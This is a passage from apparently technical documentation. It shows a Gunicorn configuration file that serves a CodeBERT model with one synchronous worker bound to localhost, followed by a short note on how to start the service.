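bind = os.environ.get("GENOS_API_BIND", "127.0.0.1:6001")
workers = 1            # one CodeBERT copy in GPU memory
worker_class = "sync"  # a single synchronous worker, per A.6
timeout = 300          # seconds; covers model load on startup
preload_app = False    # Gunicorn's default: the app (and CUDA) initializes in the worker after fork
```

It would be started with gunicorn -c gunicorn.conf.py followed by the application's module:variable path, which this document does not give.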